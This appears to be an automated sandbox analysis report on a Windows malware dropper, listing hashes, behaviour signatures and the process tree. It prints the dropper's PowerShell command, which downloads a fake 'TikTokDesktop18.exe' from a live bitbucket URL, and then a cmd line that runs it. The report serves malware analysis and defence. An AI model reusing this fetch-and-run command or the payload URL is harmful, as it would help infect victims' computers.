Analysis
max time kernel: 118s
max time network: 120s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 27/11/2024, 12:32
Static task: static1
Behavioral task: behavioral1
Sample: b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe
Resource: win7-20240903-en
General
Target: b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe
Size: 89KB
MD5: ee5fa211e0dfb2e96a3953d4bace7850
SHA1: 65884c08e3876e8aeab4f5172d48e203e60ab75b
SHA256: b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8
SHA512: ff98b501ac22fdfc0b458b9e726388bbfe8d775e3988d83312a6551cdd57d21de1d87b3f8d9bdf4f9ec50cfda2e5b360e136d09e8f76000301e510ee63accf65
SSDEEP: 1536:z7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfAw3Oj:v7DhdC6kzWypvaQ0FxyNTBfAl
Malware Config
Extracted
https://bitbucket.org/superappsss/khem-praksa/downloads/TikTokDesktop18.exe
Signatures
Blocklisted process makes network request (2 IoCs)
flow  pid   Process
5     2580  powershell.exe
6     2580  powershell.exe

Command and Scripting Interpreter: PowerShell
pid   Process
2580  powershell.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)
flow  ioc
4     bitbucket.org
5     bitbucket.org
6     bitbucket.org

System Location Discovery: System Language Discovery (1 TTPs, 1 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description  ioc                                                          Process
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe

Suspicious behavior: EnumeratesProcesses (1 IoCs)
pid   Process
2580  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
description              pid   Process
Token: SeDebugPrivilege  2580  powershell.exe

Suspicious use of WriteProcessMemory (10 IoCs)
description                       pid   Process                                                                 procid_target
PID 2008 wrote to memory of 1212  2008  b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe  31
PID 2008 wrote to memory of 1212  2008  b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe  31
PID 2008 wrote to memory of 1212  2008  b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe  31
PID 2008 wrote to memory of 1212  2008  b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe  31
PID 1212 wrote to memory of 2580  1212  cmd.exe                                                                 32
PID 1212 wrote to memory of 2580  1212  cmd.exe                                                                 32
PID 1212 wrote to memory of 2580  1212  cmd.exe                                                                 32
PID 1212 wrote to memory of 2508  1212  cmd.exe                                                                 33
PID 1212 wrote to memory of 2508  1212  cmd.exe                                                                 33
PID 1212 wrote to memory of 2508  1212  cmd.exe                                                                 33
Processes
1. C:\Users\Admin\AppData\Local\Temp\b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe"
   - System Location Discovery: System Language Discovery
   - Suspicious use of WriteProcessMemory
   PID: 2008

   2. C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8102.tmp\8103.tmp\8104.bat C:\Users\Admin\AppData\Local\Temp\b8f6f9e8718c5abc0d2d64183fb1a103f0a7caf763ba29cd96aae03f810411e8N.exe"
      - Suspicious use of WriteProcessMemory
      PID: 1212

      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         Command line: powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/superappsss/khem-praksa/downloads/TikTokDesktop18.exe', 'C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe')";
         - Blocklisted process makes network request
         - Command and Scripting Interpreter: PowerShell
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         PID: 2580

      3. C:\Windows\system32\cmd.exe
         Command line: cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe;
         PID: 2508
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 260B
MD5: 1904675eec0f302424c4bde0956dab54
SHA1: 267c3174e35e0e2a7d104f98b3326f313f2e464e
SHA256: 45fa85497886f443950af5fbd09098407a05345925fd942ac49eda67a93657e6
SHA512: fe3682e4c1d36e14d4bb6ced55d62b609a8417a98731207246f7b9419724d5463246f641e1c4b1b53ec9358e65d7938ecc0b71f2ea09455bdb61815761e9f6f3